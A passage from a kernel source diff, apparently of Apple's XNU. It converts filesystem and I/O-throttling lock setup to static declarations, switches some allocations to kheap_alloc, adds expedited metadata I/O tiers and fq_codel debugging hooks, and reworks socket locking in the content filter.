+                       vnode_put(lvp);
+               }
        }
 
        return error;
@@ -334,7 +333,7 @@ bindfs_readdir(struct vnop_readdir_args * ap)
                struct dirent *dep;
                size_t bytesread;
                bufsize = 3 * MIN((user_size_t)uio_resid(uio), 87371u) / 8;
-               MALLOC(bufptr, void *, bufsize, M_TEMP, M_WAITOK);
+               bufptr = kheap_alloc(KHEAP_TEMP, bufsize, Z_WAITOK);
                if (bufptr == NULL) {
                        return ENOMEM;
                }
@@ -377,7 +376,7 @@ bindfs_readdir(struct vnop_readdir_args * ap)
                        uio_setoffset(uio, uio_offset(auio));
                }
                uio_free(auio);
-               FREE(bufptr, M_TEMP);
+               kheap_free(KHEAP_TEMP, bufptr, bufsize);
        } else {
                error = VNOP_READDIR(lvp, ap->a_uio, ap->a_flags, ap->a_eofflag, ap->a_numdirent, ap->a_context);
                vnode_put(lvp);
index c50a91f4d3b3a7858037d7b433b3fe62b1e629df..c3bebc8a40fc13dac5703bb95c1bc612b13b85e4 100644 (file)
@@ -127,8 +127,6 @@ struct vnodeop_desc_fake {
 __BEGIN_DECLS
 
 int bindfs_init(struct vfsconf * vfsp);
-int bindfs_init_lck(lck_mtx_t * lck);
-int bindfs_destroy_lck(lck_mtx_t * lck);
 int bindfs_destroy(void);
 int bind_nodeget(
        struct mount * mp, struct vnode * lowervp, struct vnode * dvp, struct vnode ** vpp, struct componentname * cnp, int root);
index 9c861796f8e9f6ec296660af2b3dbc9d0f15ec03..c615ea6204c62b16aa65ecf5738d7146a780e549 100644 (file)
@@ -113,8 +113,8 @@ u_long fdhash;
 
 static int fdesc_attr(int fd, struct vnode_attr *vap, vfs_context_t a_context);
 
-lck_mtx_t fdesc_mtx;
-lck_grp_t *fdesc_lckgrp;
+static LCK_GRP_DECLARE(fdesc_lckgrp, "fdesc");
+static LCK_MTX_DECLARE(fdesc_mtx, &fdesc_lckgrp);
 
 static void
 fdesc_lock(void)
@@ -141,8 +141,6 @@ devfs_fdesc_init()
 
        /* XXX Make sure you have the right path... */
        fdhashtbl = hashinit(NFDCACHE, M_CACHE, &fdhash);
-       fdesc_lckgrp = lck_grp_alloc_init("fdesc", NULL);
-       lck_mtx_init(&fdesc_mtx, fdesc_lckgrp, NULL);
 
        DEVFS_LOCK();
        dev_add_entry("fd", rootdir, DEV_DEVFD, NULL, NULL, NULL, &direntp);
@@ -311,7 +309,7 @@ devfs_devfd_lookup(struct vnop_lookup_args *ap)
                *vpp = dvp;
 
                if ((error = vnode_get(dvp))) {
-                       return error;
+                       goto bad;
                }
                return 0;
        }
index 21a0ac5c07093d1eace4732d7e03410a38376c5e..5acacb6ea47d2d7cb58417e881b824a94ded98ab 100644 (file)
@@ -145,11 +145,9 @@ static devdirent_t *devfs_make_node_internal(dev_t, devfstype_t type, uid_t, gid
     int (*clone)(dev_t dev, int action), const char *fmt, va_list ap);
 
 
-lck_grp_t       * devfs_lck_grp;
-lck_grp_attr_t  * devfs_lck_grp_attr;
-lck_attr_t      * devfs_lck_attr;
-lck_mtx_t         devfs_mutex;
-lck_mtx_t         devfs_attr_mutex;
+static LCK_GRP_DECLARE(devfs_lck_grp, "devfs_lock");
+LCK_MTX_DECLARE(devfs_mutex, &devfs_lck_grp);
+LCK_MTX_DECLARE(devfs_attr_mutex, &devfs_lck_grp);
 
 os_refgrp_decl(static, devfs_refgrp, "devfs", NULL);
 
@@ -183,14 +181,6 @@ devfs_sinit(void)
 {
        int error;
 
-       devfs_lck_grp_attr = lck_grp_attr_alloc_init();
-       devfs_lck_grp = lck_grp_alloc_init("devfs_lock", devfs_lck_grp_attr);
-
-       devfs_lck_attr = lck_attr_alloc_init();
-
-       lck_mtx_init(&devfs_mutex, devfs_lck_grp, devfs_lck_attr);
-       lck_mtx_init(&devfs_attr_mutex, devfs_lck_grp, devfs_lck_attr);
-
        DEVFS_LOCK();
        error = dev_add_entry("root", NULL, DEV_DIR, NULL, NULL, NULL, &dev_root);
        DEVFS_UNLOCK();
index f01b268732f42bd901513015bade0535555dcb06..d5426b182d3e09789e93b1220b393628d58e4ca2 100644 (file)
@@ -495,7 +495,7 @@ devfs_kernel_mount(char * mntname)
        vfs_context_t ctx = vfs_context_kernel();
        char fsname[] = "devfs";
 
-       error = kernel_mount(fsname, NULLVP, NULLVP, mntname, NULL, 0, MNT_DONTBROWSE, KERNEL_MOUNT_NOAUTH, ctx);
+       error = kernel_mount(fsname, NULLVP, NULLVP, mntname, NULL, 0, MNT_DONTBROWSE, KERNEL_MOUNT_NOAUTH | KERNEL_MOUNT_DEVFS, ctx);
        if (error) {
                printf("devfs_kernel_mount: kernel_mount failed: %d\n", error);
                return error;
index dab2af73415b181f098220da4fa9938de0323b24..07c91ffaf686f4adfd5a3eff166a418653403bdd 100644 (file)
  * For the moment, mockfs is not marked in vfs_conf.c as being threadsafe.
  */
 
-extern lck_attr_t     * mockfs_mtx_attr;
-extern lck_grp_attr_t * mockfs_grp_attr;
-extern lck_grp_t      * mockfs_mtx_grp;
-
 struct mockfs_mount {
        lck_mtx_t       mockfs_mnt_mtx;         /* Mount-wide (and tree-wide) mutex */
        mockfs_fsnode_t mockfs_root;            /* Root of the node tree */
index 4a524a0546a91a02a8f8c6e57aff75e5ff16443c..588fa7aadfd70fcd2359f49bdb9d7272c3a5daf2 100644 (file)
@@ -39,9 +39,7 @@
 #include <sys/mount_internal.h>
 #include <sys/vnode_internal.h>
 
-lck_attr_t * mockfs_mtx_attr = (lck_attr_t *) 0;
-lck_grp_attr_t * mockfs_grp_attr = (lck_grp_attr_t *) 0;
-lck_grp_t * mockfs_mtx_grp = (lck_grp_t *) 0;
+static LCK_GRP_DECLARE(mockfs_mtx_grp, "mockfs-mutex");
 
 int mockfs_mountroot(mount_t mp, vnode_t rvp, __unused vfs_context_t ctx);
 
@@ -111,7 +109,7 @@ mockfs_mountroot(mount_t mp, vnode_t rvp, __unused vfs_context_t ctx)
                }
        }
 
-       lck_mtx_init(&mockfs_mount_data->mockfs_mnt_mtx, mockfs_mtx_grp, mockfs_mtx_attr);
+       lck_mtx_init(&mockfs_mount_data->mockfs_mnt_mtx, &mockfs_mtx_grp, LCK_ATTR_NULL);
 
        /*
         * All of the needed nodes/structures have been set up; now we just need to establish the relationships
@@ -140,7 +138,7 @@ done:
                        mockfs_fsnode_destroy(root_fsnode);
                }
                if (mockfs_mount_data) {
-                       lck_mtx_destroy(&mockfs_mount_data->mockfs_mnt_mtx, mockfs_mtx_grp);
+                       lck_mtx_destroy(&mockfs_mount_data->mockfs_mnt_mtx, &mockfs_mtx_grp);
                        FREE(mockfs_mount_data, M_TEMP);
                }
        }
@@ -193,7 +191,7 @@ mockfs_unmount(struct mount *mp, int mntflags, __unused vfs_context_t ctx)
                panic("mockfs_unmount: Failed to destroy the fsnode tree");
        }
 
-       lck_mtx_destroy(&mockfs_mnt->mockfs_mnt_mtx, mockfs_mtx_grp);
+       lck_mtx_destroy(&mockfs_mnt->mockfs_mnt_mtx, &mockfs_mtx_grp);
        FREE(mockfs_mnt, M_TEMP);
        mp->mnt_data = NULL;
 
@@ -227,28 +225,9 @@ mockfs_sync(__unused struct mount *mp, __unused int waitfor, __unused vfs_contex
        return 0;
 }
 
-/*
- * mockfs_init:
- *   Run once (during VFS initialization); takes care of generic mockfs initialization (which for now, means
- *   global lock information).
- *
- * Returns 0 on success, or an error.
- */
 int
 mockfs_init(__unused struct vfsconf * vfsc)
 {
-       mockfs_mtx_attr = lck_attr_alloc_init();
-       mockfs_grp_attr = lck_grp_attr_alloc_init();
-       mockfs_mtx_grp = lck_grp_alloc_init("mockfs-mutex", mockfs_grp_attr);
-
-       /*
-        * If we've failed to allocate this early in boot, something is horrendously wrong; it should be fine to
-        *   panic (for now).
-        */
-       if (!mockfs_mtx_attr || !mockfs_grp_attr || !mockfs_mtx_grp) {
-               panic("mockfs_init failed to allocate lock information");
-       }
-
        return 0;
 }
 
index caffb546ae3eee8e0bdc121468e343b53773064b..4561bec50a4e787ab7fcadf6575b8cd535b4cd93 100644 (file)
 #define NULL_NHASH(vp) (&null_node_hashtbl[((((uintptr_t)vp) >> vnsz2log) + (uintptr_t)vnode_mount(vp)) & null_hash_mask])
 
 static LIST_HEAD(null_node_hashhead, null_node) * null_node_hashtbl;
-static lck_mtx_t null_hashmtx;
-static lck_attr_t * null_hashlck_attr;
-static lck_grp_t * null_hashlck_grp;
-static lck_grp_attr_t * null_hashlck_grp_attr;
+static LCK_GRP_DECLARE(null_hashlck_grp, "com.apple.filesystems.nullfs");
+static LCK_MTX_DECLARE(null_hashmtx, &null_hashlck_grp);
 static u_long null_hash_mask;
 
 /* os x doesn't have hashes built into vnode. gonna try doing what freebsd does
@@ -97,26 +95,16 @@ static int vnsz2log = 9;
 
 static int null_hashins(struct mount *, struct null_node *, struct vnode **);
 
-int
+void
 nullfs_init_lck(lck_mtx_t * lck)
 {
-       int error = 1;
-       if (lck && null_hashlck_grp && null_hashlck_attr) {
-               lck_mtx_init(lck, null_hashlck_grp, null_hashlck_attr);
-               error = 0;
-       }
-       return error;
+       lck_mtx_init(lck, &null_hashlck_grp, LCK_ATTR_NULL);
 }
 
-int
+void
 nullfs_destroy_lck(lck_mtx_t * lck)
 {
-       int error = 1;
-       if (lck && null_hashlck_grp) {
-               lck_mtx_destroy(lck, null_hashlck_grp);
-               error = 0;
-       }
-       return error;
+       lck_mtx_destroy(lck, &null_hashlck_grp);
 }
 
 /*
@@ -126,62 +114,17 @@ int
 nullfs_init(__unused struct vfsconf * vfsp)
 {
        NULLFSDEBUG("%s\n", __FUNCTION__);
-
-       /* assuming for now that this happens immediately and by default after fs
-        * installation */
-       null_hashlck_grp_attr = lck_grp_attr_alloc_init();
-       if (null_hashlck_grp_attr == NULL) {
-               goto error;
-       }
-       null_hashlck_grp = lck_grp_alloc_init("com.apple.filesystems.nullfs", null_hashlck_grp_attr);
-       if (null_hashlck_grp == NULL) {
-               goto error;
-       }
-       null_hashlck_attr = lck_attr_alloc_init();
-       if (null_hashlck_attr == NULL) {
-               goto error;
-       }
-
-       lck_mtx_init(&null_hashmtx, null_hashlck_grp, null_hashlck_attr);
        null_node_hashtbl = hashinit(NULL_HASH_SIZE, M_TEMP, &null_hash_mask);
        NULLFSDEBUG("%s finished\n", __FUNCTION__);
        return 0;
-error:
-       printf("NULLFS: failed to get lock element\n");
-       if (null_hashlck_grp_attr) {
-               lck_grp_attr_free(null_hashlck_grp_attr);
-               null_hashlck_grp_attr = NULL;
-       }
-       if (null_hashlck_grp) {
-               lck_grp_free(null_hashlck_grp);
-               null_hashlck_grp = NULL;
-       }
-       if (null_hashlck_attr) {
-               lck_attr_free(null_hashlck_attr);
-               null_hashlck_attr = NULL;
-       }
-       return KERN_FAILURE;
 }
 
 int
-nullfs_uninit()
+nullfs_uninit(void)
 {
        /* This gets called when the fs is uninstalled, there wasn't an exact
         * equivalent in vfsops */
-       lck_mtx_destroy(&null_hashmtx, null_hashlck_grp);
        hashdestroy(null_node_hashtbl, M_TEMP, null_hash_mask);
-       if (null_hashlck_grp_attr) {
-               lck_grp_attr_free(null_hashlck_grp_attr);
-               null_hashlck_grp_attr = NULL;
-       }
-       if (null_hashlck_grp) {
-               lck_grp_free(null_hashlck_grp);
-               null_hashlck_grp = NULL;
-       }
-       if (null_hashlck_attr) {
-               lck_attr_free(null_hashlck_attr);
-               null_hashlck_attr = NULL;
-       }
        return 0;
 }
 
index b09395429b7c69dc0c6e8237d0d8324a30909685..c0f5ac6e7fe38de0259b77598121d42cdcf10a89 100644 (file)
@@ -221,10 +221,7 @@ nullfs_mount(struct mount * mp, __unused vnode_t devvp, user_addr_t user_data, v
        vnode_ref(vp);
        vnode_put(vp);
 
-       error = nullfs_init_lck(&xmp->nullm_lock);
-       if (error) {
-               goto error;
-       }
+       nullfs_init_lck(&xmp->nullm_lock);
 
        xmp->nullm_rootvp = vp;
 
index a351309c3c6e5f355076d51973106da91bb89a9e..176f84e7419e7ab3a83fa88c5d8840d640b7f738 100644 (file)
@@ -403,6 +403,9 @@ null_get_lowerparent(vnode_t lvp, vnode_t * dvpp, vfs_context_t ctx)
        error = vnode_getattr(lvp, &va, ctx);
 
        if (error || !VATTR_IS_SUPPORTED(&va, va_parentid)) {
+               if (!error) {
+                       error = ENOTSUP;
+               }
                goto end;
        }
 
@@ -605,11 +608,10 @@ notdot:
                if (error == 0) {
                        *ap->a_vpp = vp;
                }
-       }
-
-       /* if we got lvp, drop the iocount from VNOP_LOOKUP */
-       if (lvp != NULL) {
-               vnode_put(lvp);
+               /* if we got lvp, drop the iocount from VNOP_LOOKUP */
+               if (lvp != NULL) {
+                       vnode_put(lvp);
+               }
        }
 
        nullfs_cleanup_patched_context(null_mp, ectx);
index 4dd8d50f62a2a83a20e2da28f5aec4986558b6b7..0ed22771f2a8ce9eb4a05dc989e42abb23a17501 100644 (file)
@@ -139,8 +139,8 @@ struct vnodeop_desc_fake {
 __BEGIN_DECLS
 
 int nullfs_init(struct vfsconf * vfsp);
-int nullfs_init_lck(lck_mtx_t * lck);
-int nullfs_destroy_lck(lck_mtx_t * lck);
+void nullfs_init_lck(lck_mtx_t * lck);
+void nullfs_destroy_lck(lck_mtx_t * lck);
 int nullfs_uninit(void);
 int null_nodeget(
        struct mount * mp, struct vnode * lowervp, struct vnode * dvp, struct vnode ** vpp, struct componentname * cnp, int root);
index 42e0822031608aedda5c162677cd45b294a099d3..a4f8fc1700a4f4c42c5b71036b34101d2b0f212d 100644 (file)
@@ -65,25 +65,16 @@ static int routefserr_lookup(__unused struct vnop_lookup_args * args);
 static int routefserr_setlabel(__unused struct vnop_setlabel_args * args);
 
 
-lck_grp_t       * routefs_lck_grp;
-lck_grp_attr_t  * routefs_lck_grp_attr;
-lck_attr_t      * routefs_lck_attr;
-lck_mtx_t         routefs_mutex;
+LCK_GRP_DECLARE(routefs_lck_grp, "routefs_lock");
+LCK_MTX_DECLARE(routefs_mutex, &routefs_lck_grp);;
 
 #define ROUTEFS_LOCK()    lck_mtx_lock(&routefs_mutex)
 #define ROUTEFS_UNLOCK()  lck_mtx_unlock(&routefs_mutex)
-static int _lock_inited = 0;
 static boolean_t _fs_alreadyMounted = FALSE;  /* atleast a mount of this filesystem is present */
 
 static int
 routefs_init(__unused struct vfsconf *vfsp)
 {
-       routefs_lck_grp_attr = lck_grp_attr_alloc_init();
-       routefs_lck_grp = lck_grp_alloc_init("routefs_lock", routefs_lck_grp_attr);
-       routefs_lck_attr = lck_attr_alloc_init();
-       lck_mtx_init(&routefs_mutex, routefs_lck_grp, routefs_lck_attr);
-       _lock_inited = 1;
-
        return 0;
 }
 
index eaa194215874e1e822d17096c8a5e1982ef60e75..cb15e014634ac133a9d20e91a87a1e9637dd53c1 100644 (file)
 #include <sys/kdebug.h>
 #include <libkern/section_keywords.h>
 
+#if CONFIG_IO_COMPRESSION_STATS
+#include <vfs/vfs_io_compression_stats.h>
+#endif /* CONFIG_IO_COMPRESSION_STATS */
+
 /* XXX following three prototypes should be in a header file somewhere */
 extern dev_t    chrtoblk(dev_t dev);
 extern boolean_t        iskmemdev(dev_t dev);
@@ -943,9 +947,7 @@ SYSCTL_INT(_debug, OID_AUTO, lowpri_throttle_tier3_io_period_ssd_msecs, CTLFLAG_
 SYSCTL_INT(_debug, OID_AUTO, lowpri_throttle_enabled, CTLFLAG_RW | CTLFLAG_LOCKED, &lowpri_throttle_enabled, 0, "");
 
 
-static lck_grp_t        *throttle_lock_grp;
-static lck_attr_t       *throttle_lock_attr;
-static lck_grp_attr_t   *throttle_lock_grp_attr;
+static LCK_GRP_DECLARE(throttle_lock_grp, "throttle I/O");
 
 
 /*
@@ -997,7 +999,7 @@ throttle_info_rel(struct _throttle_io_info_t *info)
        if ((info->throttle_refcnt == 0) && (info->throttle_alloc)) {
                DEBUG_ALLOC_THROTTLE_INFO("Freeing info = %p\n", info);
 
-               lck_mtx_destroy(&info->throttle_lock, throttle_lock_grp);
+               lck_mtx_destroy(&info->throttle_lock, &throttle_lock_grp);
                FREE(info, M_TEMP);
        }
        return oldValue;
@@ -1412,24 +1414,14 @@ throttle_init(void)
 #if CONFIG_IOSCHED
        int     iosched;
 #endif
-       /*
-        * allocate lock group attribute and group
-        */
-       throttle_lock_grp_attr = lck_grp_attr_alloc_init();
-       throttle_lock_grp = lck_grp_alloc_init("throttle I/O", throttle_lock_grp_attr);
 
        /* Update throttle parameters based on device tree configuration */
        throttle_init_throttle_window();
 
-       /*
-        * allocate the lock attribute
-        */
-       throttle_lock_attr = lck_attr_alloc_init();
-
        for (i = 0; i < LOWPRI_MAX_NUM_DEV; i++) {
                info = &_throttle_io_info[i];
 
-               lck_mtx_init(&info->throttle_lock, throttle_lock_grp, throttle_lock_attr);
+               lck_mtx_init(&info->throttle_lock, &throttle_lock_grp, LCK_ATTR_NULL);
                info->throttle_timer_call = thread_call_allocate((thread_call_func_t)throttle_timer, (thread_call_param_t)info);
 
                for (level = 0; level <= THROTTLE_LEVEL_END; level++) {
@@ -1547,7 +1539,7 @@ throttle_info_create(void)
        DEBUG_ALLOC_THROTTLE_INFO("Creating info = %p\n", info, info );
        info->throttle_alloc = TRUE;
 
-       lck_mtx_init(&info->throttle_lock, throttle_lock_grp, throttle_lock_attr);
+       lck_mtx_init(&info->throttle_lock, &throttle_lock_grp, LCK_ATTR_NULL);
        info->throttle_timer_call = thread_call_allocate((thread_call_func_t)throttle_timer, (thread_call_param_t)info);
 
        for (level = 0; level <= THROTTLE_LEVEL_END; level++) {
@@ -2127,6 +2119,12 @@ throttle_get_thread_effective_io_policy()
        return proc_get_effective_thread_policy(current_thread(), TASK_POLICY_IO);
 }
 
+int
+throttle_thread_io_tier_above_metadata(void)
+{
+       return throttle_get_thread_effective_io_policy() < IOSCHED_METADATA_TIER;
+}
+
 void
 throttle_info_reset_window(uthread_t ut)
 {
@@ -2515,20 +2513,27 @@ spec_strategy(struct vnop_strategy_args *ap)
 
 #if CONFIG_IOSCHED
        /*
-        * For I/O Scheduling, we currently do not have a way to track and expedite metadata I/Os.
-        * To ensure we dont get into priority inversions due to metadata I/Os, we use the following rules:
-        * For metadata reads, ceil all I/Os to IOSCHED_METADATA_TIER & mark them passive if the I/O tier was upgraded
-        * For metadata writes, unconditionally mark them as IOSCHED_METADATA_TIER and passive
+        * For metadata reads, ceil the I/O tier to IOSCHED_METADATA_EXPEDITED_TIER if they are expedited, otherwise
+        * ceil it to IOSCHED_METADATA_TIER. Mark them passive if the I/O tier was upgraded.
+        * For metadata writes, set the I/O tier to IOSCHED_METADATA_EXPEDITED_TIER if they are expedited. Otherwise
+        * set it to IOSCHED_METADATA_TIER. In addition, mark them as passive.
         */
        if (bap->ba_flags & BA_META) {
                if ((mp && (mp->mnt_ioflags & MNT_IOFLAGS_IOSCHED_SUPPORTED)) || (bap->ba_flags & BA_IO_SCHEDULED)) {
                        if (bp->b_flags & B_READ) {
-                               if (io_tier > IOSCHED_METADATA_TIER) {
+                               if ((bap->ba_flags & BA_EXPEDITED_META_IO) && (io_tier > IOSCHED_METADATA_EXPEDITED_TIER)) {
+                                       io_tier = IOSCHED_METADATA_EXPEDITED_TIER;
+                                       passive = 1;
+                               } else if (io_tier > IOSCHED_METADATA_TIER) {
                                        io_tier = IOSCHED_METADATA_TIER;
                                        passive = 1;
                                }
                        } else {
-                               io_tier = IOSCHED_METADATA_TIER;
+                               if (bap->ba_flags & BA_EXPEDITED_META_IO) {
+                                       io_tier = IOSCHED_METADATA_EXPEDITED_TIER;
+                               } else {
+                                       io_tier = IOSCHED_METADATA_TIER;
+                               }
                                passive = 1;
                        }
                }
@@ -2591,6 +2596,9 @@ spec_strategy(struct vnop_strategy_args *ap)
                    buf_kernel_addrperm_addr(bp), bdev, buf_blkno(bp), buf_count(bp), 0);
        }
 
+#if CONFIG_IO_COMPRESSION_STATS
+       io_compression_stats(bp);
+#endif /* CONFIG_IO_COMPRESSION_STATS */
        thread_update_io_stats(current_thread(), buf_count(bp), code);
 
        if (mp != NULL) {
index 1ec52efea2e1d0e03a59a79db258e940f07bfbe7..a3cd15205547f5181ea0fb44a1d67640a3714318 100644 (file)
@@ -93,6 +93,11 @@ typedef struct classq_pkt {
 #define CLASSQ_PKT_INITIALIZER(_p)      \
        (classq_pkt_t){ .cp_mbuf = NULL, .cp_ptype = QP_INVALID }
 
+#define CLASSQ_PKT_INIT(_p)    do {    \
+       (_p)->cp_ptype = QP_INVALID;   \
+       (_p)->cp_mbuf = NULL;          \
+} while (0)
+
 #define CLASSQ_PKT_INIT_MBUF(_p, _m)    do {    \
        (_p)->cp_ptype = QP_MBUF;               \
        (_p)->cp_mbuf = (_m);                   \
@@ -183,6 +188,9 @@ typedef struct _class_queue_ {
 #define CLASSQF_ECN     (CLASSQF_ECN4 | CLASSQF_ECN6)
 
 extern u_int32_t classq_verbose;
+#if DEBUG || DEVELOPMENT
+extern uint16_t fq_codel_quantum;
+#endif /* DEBUG || DEVELOPMENT */
 
 SYSCTL_DECL(_net_classq);
 
index f587e768971dd8a9683ae403df30ffe69b27e601..e78ceefdf2d46392a3d26be9e51927ca41267cea 100644 (file)
@@ -97,12 +97,16 @@ fq_alloc(classq_pkt_type_t ptype)
        if (ptype == QP_MBUF) {
                MBUFQ_INIT(&fq->fq_mbufq);
        }
+       CLASSQ_PKT_INIT(&fq->fq_dq_head);
+       CLASSQ_PKT_INIT(&fq->fq_dq_tail);
+       fq->fq_in_dqlist = false;
        return fq;
 }
 
 void
 fq_destroy(fq_t *fq)
 {
+       VERIFY(fq->fq_flags & FQF_DESTROYED);
        VERIFY(fq_empty(fq));
        VERIFY(!(fq->fq_flags & (FQF_NEW_FLOW | FQF_OLD_FLOW)));
        VERIFY(fq->fq_bytes == 0);
@@ -127,6 +131,10 @@ fq_detect_dequeue_stall(fq_if_t *fqs, fq_t *flowq, fq_if_classq_t *fq_cl,
                 */
                FQ_SET_DELAY_HIGH(flowq);
                fq_cl->fcl_stat.fcl_dequeue_stall++;
+               os_log_error(OS_LOG_DEFAULT, "%s: dequeue stall num: %d, "
+                   "scidx: %d, flow: 0x%x, iface: %s", __func__,
+                   fq_cl->fcl_stat.fcl_dequeue_stall, flowq->fq_sc_index,
+                   flowq->fq_flowhash, if_name(fqs->fqs_ifq->ifcq_ifp));
        }
 }
 
@@ -314,8 +322,7 @@ fq_addq(fq_if_t *fqs, pktsched_pkt_t *pkt, fq_if_classq_t *fq_cl)
 
        /* Set the return code correctly */
        if (__improbable(fc_adv == 1 && droptype != DTYPE_FORCED)) {
-               if (fq_if_add_fcentry(fqs, pkt, pkt_flowid, pkt_flowsrc,
-                   fq_cl)) {
+               if (fq_if_add_fcentry(fqs, pkt, pkt_flowsrc, fq, fq_cl)) {
                        fq->fq_flags |= FQF_FLOWCTL_ON;
                        /* deliver flow control advisory error */
                        if (droptype == DTYPE_NODROP) {
@@ -375,7 +382,7 @@ fq_addq(fq_if_t *fqs, pktsched_pkt_t *pkt, fq_if_classq_t *fq_cl)
                                 */
                                if (fq_empty(fq) && !(fq->fq_flags &
                                    (FQF_NEW_FLOW | FQF_OLD_FLOW))) {
-                                       fq_if_destroy_flow(fqs, fq_cl, fq);
+                                       fq_if_destroy_flow(fqs, fq_cl, fq, true);
                                        fq = NULL;
                                }
                        } else {
@@ -509,6 +516,11 @@ fq_getq_flow(fq_if_t *fqs, fq_t *fq, pktsched_pkt_t *pkt)
                if (fq->fq_min_qdelay > fqs->fqs_target_qdelay) {
                        if (!FQ_IS_DELAYHIGH(fq)) {
                                FQ_SET_DELAY_HIGH(fq);
+                               os_log_error(OS_LOG_DEFAULT,
+                                   "%s: high delay idx: %d, %llu, flow: 0x%x, "
+                                   "iface: %s", __func__, fq->fq_sc_index,
+                                   fq->fq_min_qdelay, fq->fq_flowhash,
+                                   if_name(fqs->fqs_ifq->ifcq_ifp));
                        }
                } else {
                        FQ_CLEAR_DELAY_HIGH(fq);
index b8c4d10beb1f5600f0ebf1ed32060da035f17709..e2f0114f15446d34ba40088994948dbf1182dc8f 100644 (file)
@@ -57,9 +57,10 @@ typedef struct flowq {
 #define FQF_NEW_FLOW    0x04    /* Currently on new flows queue */
 #define FQF_OLD_FLOW    0x08    /* Currently on old flows queue */
 #define FQF_FLOWCTL_ON  0x10    /* Currently flow controlled */
+#define FQF_DESTROYED   0x80    /* flowq destroyed */
        uint8_t        fq_flags;       /* flags */
        uint8_t        fq_sc_index; /* service_class index */
-       int16_t         fq_deficit;     /* Deficit for scheduling */
+       int32_t        fq_deficit;     /* Deficit for scheduling */
        uint32_t       fq_bytes;       /* Number of bytes in the queue */
        uint64_t       fq_min_qdelay; /* min queue delay for Codel */
        uint64_t       fq_updatetime; /* next update interval */
@@ -68,6 +69,11 @@ typedef struct flowq {
        STAILQ_ENTRY(flowq) fq_actlink; /* for new/old flow queues */
        uint32_t       fq_flowhash;    /* Flow hash */
        classq_pkt_type_t       fq_ptype; /* Packet type */
+       /* temporary packet queue for dequeued packets */
+       classq_pkt_t   fq_dq_head;
+       classq_pkt_t   fq_dq_tail;
+       STAILQ_ENTRY(flowq) fq_dqlink; /* entry on dequeue flow list */
+       bool           fq_in_dqlist;
 } fq_t;
 
 #define fq_mbufq        __fq_pktq_u.__mbufq
index d18e9c7670f25559dbfa0fb4864336b69785a282..d35cf2fa0aab9e1e7fc07393f9a7afa854e24507 100644 (file)
@@ -64,13 +64,29 @@ SYSCTL_QUAD(_net_classq, OID_AUTO, update_interval,
     CTLFLAG_RW | CTLFLAG_LOCKED, &ifclassq_update_interval,
     "update interval in nanoseconds");
 
+#if DEBUG || DEVELOPMENT
+uint32_t ifclassq_flow_control_adv = 1; /* flow control advisory */
+SYSCTL_UINT(_net_classq, OID_AUTO, flow_control_adv,
+    CTLFLAG_RW | CTLFLAG_LOCKED, &ifclassq_flow_control_adv, 1,
+    "enable/disable flow control advisory");
+
+uint16_t fq_codel_quantum = 0;
+#endif /* DEBUG || DEVELOPMENT */
+
 void
 classq_init(void)
 {
        _CASSERT(MBUF_TC_BE == 0);
        _CASSERT(MBUF_SC_BE == 0);
        _CASSERT(IFCQ_SC_MAX == MBUF_SC_MAX_CLASSES);
-
+#if DEBUG || DEVELOPMENT
+       PE_parse_boot_argn("fq_codel_quantum", &fq_codel_quantum,
+           sizeof(fq_codel_quantum));
+       PE_parse_boot_argn("ifclassq_target_qdelay", &ifclassq_target_qdelay,
+           sizeof(ifclassq_target_qdelay));
+       PE_parse_boot_argn("ifclassq_update_interval",
+           &ifclassq_update_interval, sizeof(ifclassq_update_interval));
+#endif /* DEBUG || DEVELOPMENT */
        fq_codel_init();
 }
 
index 15e6b6bb45e7349a3e305113bdac9cfd8d09644a..51f7993dafe442c149709e57193aa6d24574ef00 100644 (file)
@@ -100,6 +100,10 @@ struct ifclassq;
 enum cqdq_op;
 enum cqrq;
 
+#if DEBUG || DEVELOPMENT
+extern uint32_t ifclassq_flow_control_adv;
+#endif /* DEBUG || DEVELOPMENT */
+
 typedef int (*ifclassq_enq_func)(struct ifclassq *, classq_pkt_t *,
     boolean_t *);
 typedef void  (*ifclassq_deq_func)(struct ifclassq *, classq_pkt_t *);
index 7617e7757fac51fda31126a25d37c3ba1393f49d..e33a2a4086ef4053684cd72f97d15ea7a3095d26 100644 (file)
@@ -1605,45 +1605,39 @@ cfil_sock_id_from_socket(struct socket *so)
        }
 }
 
-static bool
-cfil_socket_safe_lock(struct inpcb *inp)
-{
-       if (in_pcb_checkstate(inp, WNT_ACQUIRE, 0) != WNT_STOPUSING) {
-               socket_lock(inp->inp_socket, 1);
-               if (in_pcb_checkstate(inp, WNT_RELEASE, 1) != WNT_STOPUSING) {
-                       return true;
-               }
-               socket_unlock(inp->inp_socket, 1);
-       }
-       return false;
-}
-
 /*
- * cfil_socket_safe_lock_rip -
- * This routine attempts to lock the rip socket safely.
- * The passed in ripcbinfo is assumed to be locked and must be unlocked (regardless
- * of success/failure) before calling socket_unlock().  This is to avoid double
- * locking since rip_unlock() will lock ripcbinfo if it needs to dispose inpcb when
+ * cfil_socket_safe_lock -
+ * This routine attempts to lock the socket safely.
+ *
+ * The passed in pcbinfo is assumed to be locked and must be unlocked once the
+ * inp state is safeguarded and before we attempt to lock/unlock the socket.
+ * This is to prevent getting blocked by socket_lock() while holding the pcbinfo
+ * lock, avoiding potential deadlock with other processes contending for the same
+ * resources.  This is also to avoid double locking the pcbinfo for rip sockets
+ * since rip_unlock() will lock ripcbinfo if it needs to dispose inpcb when
  * so_usecount is 0.
  */
 static bool
-cfil_socket_safe_lock_rip(struct inpcb *inp, struct inpcbinfo *pcbinfo)
+cfil_socket_safe_lock(struct inpcb *inp, struct inpcbinfo *pcbinfo)
 {
        struct socket *so = NULL;
 
        VERIFY(pcbinfo != NULL);
 
        if (in_pcb_checkstate(inp, WNT_ACQUIRE, 0) != WNT_STOPUSING) {
+               // Safeguarded the inp state, unlock pcbinfo before locking socket.
+               lck_rw_done(pcbinfo->ipi_lock);
+
                so = inp->inp_socket;
                socket_lock(so, 1);
                if (in_pcb_checkstate(inp, WNT_RELEASE, 1) != WNT_STOPUSING) {
-                       lck_rw_done(pcbinfo->ipi_lock);
                        return true;
                }
+       } else {
+               // Failed to safeguarded the inp state, unlock pcbinfo and abort.
+               lck_rw_done(pcbinfo->ipi_lock);
        }
 
-       lck_rw_done(pcbinfo->ipi_lock);
-
        if (so) {
                socket_unlock(so, 1);
        }
@@ -1675,10 +1669,11 @@ cfil_socket_from_sock_id(cfil_sock_id_t cfil_sock_id, bool udp_only)
                    inp->inp_flowhash == flowhash &&
                    (inp->inp_socket->so_gencnt & 0x0ffffffff) == gencnt &&
                    inp->inp_socket->so_cfil != NULL) {
-                       if (cfil_socket_safe_lock(inp)) {
